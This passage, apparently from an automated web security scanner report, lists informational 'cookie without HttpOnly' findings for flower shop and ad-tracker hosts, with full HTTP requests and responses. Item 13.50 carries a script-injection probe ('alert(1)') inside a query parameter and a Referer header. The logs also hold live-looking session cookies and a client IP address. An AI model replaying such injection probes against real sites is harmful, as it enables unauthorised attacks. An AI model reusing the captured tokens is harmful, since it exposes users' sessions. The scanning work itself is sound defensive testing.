Set-Cookie: rsi_segs_1000000=pUPF4zOhOAIMpzbh+EW4hpixLq0GQ6VJBS3B3AJ2lIpZKid5Bk8CBcvtjTU1pj8gP1jKG78pMfrrd5ZBGsJfD0QJWyaDFaFmfmF08TRNeK3vxtK30PogMNGUt7RVHYp4KOkQyH3jOhyI3uNf6F9/vqTOvR5x+moIVmc0TUC3mXnaW2egq/Qzgu4Ww9iZZEXOULmtbZ0zv58VVKxkKPtsFhl62M9NeGkRuwqq2T0rQsRDYIU4lZQIEcxBQePwIBHAdekpt/HRg5xeTyxMruLCHrUlqnAvH0met8d+ElR2hKyFDfLAnvq2QeZ+ROpJjAcS0ZTXzXic4c4h0spLvmQu7UnsrpWbJ1h5SGY3k3b1vgVQORb7wUFtdNFy8Ts6muDd7dApAZXifn/tV2DQGX/WbGNqCf8xBYYSIhPnMm+QAnzFe/4wCNcPOF15jNiRW9RWJvQden4ZUXKJgMJwJPIzbWCpC9U4Ds7idPOe3oTGmKxyXtm6W7hnD2kkLo3f+FCp9k0j1gIe8JLfAMAGWbPA1uDj2m7mt2Y07JoVegrWYDFJ; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
Set-Cookie: rtc_OGR2=MLvntzM1ZwprJ5GrZptPU8kfvO50XCqRdbbBVCzWA7wKgWGALKgYuCgokRUkKaVbf6iua6BFIG+TILu7TbUmMXZ4av8HRAe4KYFLWnH2fWgnisgOGBeZmmKUqquUkgC4hRzXGKFab7Lb9B59JNOJ/xFb8GBXg5jvFxrHVbli/8Zor/9ChiL4/bQm6TO6TWxu4AgYzNZ72h1XqxtG9p0MdrNQe3LHXC6fnG1kByw3zyobXTfPi4DPALx4NKQns9E+z57ujh9chYrntouXx7ACuW4riwKRXnGFWaXd9XYjGOfk1HcOLoD/R5QVFVRuoMUGopU31HECElX6E2bfLU+9tdIDU+kUTRCmWr5JLrb87Jt7OVaoLAq/85Y9Ms44mJIcn0rkW9LUePFWksHE2CoKDepJjuyWa3ETKZ0Aq9xaUXtHIO3c28po3oYn6A8ZpH3iIktkPZLMJm2IsaHRp5SdnL4h/haqoSoy+G0JIgrh9+YoXKMNIUuxY8Hsb1z7aJDhNimaKb2aalXhIMbWA7etx8/6CzIr88c0OddsBPCHXCJIddMXYFgBI6+8PXCr8hQLd2ICbxdDKY7scjurnOw05lMFkma6YksmU9q2R2zn2ajltv5jpc00N/GUaqd7lFY7wi+33n9K2dHnDyqe2AWfOsKZeN7pBeT9lJqwcq6za++tJckSpQd8Np0e+b5H29rw2ZkqFHmdRcDtJ0ne+0DA5+zwohtVTNp7a5TBfAwnlfZ07CddeADkdqY+9Ngfj1gSsmBTivZBx9XEnRMrLnmeE2SPBab+WsIc/dOvBYfymKPtuyg7ANae+sxwmf/gJVGxYYlBZ9uHupi17rZAniqBNddhUmuqJoZJKQ+Gryj+0HeBIpYNjHxMGjndI8DLD4ELT6ZIPmijIaC/DL0eQYkcP9TcXBMOEhg7h8af15wUtndadKLvnQ2fLYsJ5ZYKfHc4xImm/XGb4yo0MgL7eJokNFX37BpCpEpncs9aC6Uy9LFtas6VSGf3a4/u+RqaWD7M8z8Hjqn3p5g70qm83Sx9hv7HiudM4ekcQQcm3rFe5RNB2yMfXWPnGeriO8IA64YLzH6adffaB6BBVdjfXTxnqIa3jTBTiBQtc24eDqBLafRWpwCJfAZjjxOZVZUxg2DAxJIfkT1QWphzCXkIPL9hUCYaJH0pHMVM0F/oAlXEPpEQW5pwrauue6TVqIKlQcAlnVabYJRpUFSEp0taV8MknpG5owQC20y7BfggSb/I74viqZvRKAHemiJM2Zoy/XCCnDNb24svlN7Wk815hWml+5yHBuHiOwGhDPYmJAQ8WKx3BLduOn80UZ5yRj4KiS94Z5AOLBJojzSBCuqhf3XJdWfaheh5ogEr+OpcEbkzbnPKuv3wbHYlyYfYZzzSJjZnHwveZGHLfJw5hRPIOguoeynfb8pi3L9wnmCtiIG/W+rLac5yPWgI2quVhRGozXl0Hr/7+LPz1zwP+ET482CD/BXd4v3bh/84xeB8VAs/TUJ7byaeEQMNWsn7jXMbBvSzv+zJOkCfiZyLa8GWQA8=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:18:54 GMT

13.46. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902865_11051:0_13981:207803_13479:207803_15758:367136_12704:367136_4895:795321_10164:1159597_10638:1159597_10640:1159597_10641:1159597_1437:1159597_1660:1723193; uid=1_1304902865_1303179323923:6792170478871670; kwd=1_1304902865_12936:207803_11317:1159597_11717:1159597_11718:1159597_11719:1159597; sit=1_1304902865_3006:0:0_3455:207803:207803_2988:430083:395912_3801:542526:542106_1714:827059:795321_3306:1054685:367136_719:1160424:1159597_2451:1211293:1206193_3236:1369256:1369138_782:1723542:1723193; cre=1_1304902865_29802:59536:1:541894_29805:59534:1:542555; bpd=1_1304902865_1ZCU5:4QMi; apd=1_1304902865; scg=1_1304902865; ppd=1_1304902865; afl=1_1304902865

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1304902873_11051:0_13981:207811_13479:207811_15758:367144_12704:367144_4895:795329_10164:1159605_10638:1159605_10640:1159605_10641:1159605_1437:1159605_1660:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: uid=1_1304902873_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: kwd=1_1304902873_12936:207811_11317:1159605_11717:1159605_11718:1159605_11719:1159605; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: sit=1_1304902873_3006:8:0_3455:207811:207811_2988:430091:395920_3801:542534:542114_1714:827067:795329_3306:1054693:367144_719:1160432:1159605_2451:1211301:1206201_3236:1369264:1369146_782:1723550:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: cre=1_1304902873_29802:59536:1:541902_29805:59534:1:542563; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: bpd=1_1304902873_1ZCU5:4QMq; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: apd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: scg=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: ppd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: afl=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:01:13 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
13.47. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-0fxbD82AR3K-g.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Welcome HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EIcAGO8kjVmtjIMIufKMgQG7AQHYBoG0AJrRo5lYEPGaOCbTzF4os9HUosxSCyo0wR_hEMIAwfEIICDSDiAJ0Tu2CpGSx0MQIRgguzLBLTOBKCAwLh6DS1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sjA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EJcAJe8kjVmM-5GL0ZmY8frRi58oyBABuwEB2gaB9ACa0aOZWBDxmjgm08xeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4eg0tTnxQATSAOiSAOEAviC2SxCCSLLTlKOLIw; expires=Sun, 07-Aug-2011 01:01:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 09 May 2011 01:01:00 GMT
Server: QS

GIF89a.......,.................D..;
13.48. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5970|1|14 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%265970%3D1; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C%265970%3D11825%2C0%2C1%2C14%2C; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
13.49. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
13.50. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
13.51. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
13.52. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rrserver/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304902956346&p=%7C91637&cts=http%3A%2F%2Fww30.1800flowers.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800flowers.com%2Fproduct.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pendprch=b73.1303848210023.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; uc=525826ce-e29a-4f38-4315-024be4d0c771; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:13:07 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: pendprch=b82.1304903587088.null.59433447%7C; Expires=Sat, 27-May-2079 04:27:14 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 21686

var rr_recs={placements:[{used:false,placementType:'cart_page.bottom',html:'<div class="rr_main" id="rrRecs"><div class="rr_strategy">People Who Viewed "Fields of Europe&trade; for Spring" Also Viewe
...[SNIP]...
13.53. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

